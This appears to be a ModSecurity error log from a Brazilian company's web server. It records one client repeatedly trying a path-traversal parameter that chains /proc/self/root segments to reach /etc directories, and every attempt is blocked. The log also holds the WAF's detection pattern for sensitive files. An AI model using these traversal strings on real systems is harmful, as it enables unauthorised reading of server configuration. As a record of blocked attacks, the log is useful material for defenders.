https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:00:43.611104 2026] [:error] [pid 29507:tid 140411565680384] [client 74.7.241.46:55764] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhha0r9dMAiw-8KANNcqQAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:00:45.009124 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.241.46:55772] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhbdSswJuvopo3lOh0ZgAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:00:47.399315 2026] [:error] [pid 15568:tid 140411725141760] [client 74.7.241.46:55788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhb6QpVkWug9HeOt9K1AAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:00:48.802797 2026] [:error] [pid 15568:tid 140411607643904] [client 74.7.241.46:45366] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhcKQpVkWug9HeOt9K1QAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:00:54.465004 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:45374] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhdqQpVkWug9HeOt9K2wAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:00:56.979284 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:45384] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhheLysWC90G-1nBrBYxgAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:00:58.305244 2026] [:error] [pid 15568:tid 140411548894976] [client 74.7.241.46:39244] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhheqQpVkWug9HeOt9K3gAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:03.332107 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.241.46:39246] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhf46lpbStxTqkSkt_nQAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:04.641444 2026] [:error] [pid 29507:tid 140411691570944] [client 74.7.241.46:39256] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhgEr9dMAiw-8KANNcqwAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:06.971591 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:39264] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhgv9ocpUE4ed4uDwH1AAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:08.335110 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.241.46:58378] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhhI6lpbStxTqkSkt_ngAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:09.526754 2026] [:error] [pid 29802:tid 140411725141760] [client 74.7.241.46:58390] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhhc_BxrYCr4hPDw_-_AAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:19.676069 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:58400] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhj7ABkC4fWIHEf8EJbAAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:21.046672 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:44664] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhkY6lpbStxTqkSkt_oAAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:22.297553 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.241.46:44672] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhkv9ocpUE4ed4uDwH6gAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:24.335831 2026] [:error] [pid 29507:tid 140411649607424] [client 74.7.241.46:44676] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhk0r9dMAiw-8KANNcsAAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:25.663527 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.241.46:44686] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhlY6lpbStxTqkSkt_oQAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:27.055439 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.241.46:44700] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhl6QpVkWug9HeOt9K4AAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:27.163636 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.228.16:36326] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhhl0r9dMAiw-8KANNcsQAAAQQ"]
[Mon Mar 16 17:01:28.271659 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.241.46:46182] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhmKTCbgAP5jq5TehB4QAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:29.595219 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.241.46:46186] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhmbysWC90G-1nBrBY3QAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:39.319195 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.241.46:46188] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhho7ABkC4fWIHEf8EJdwAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
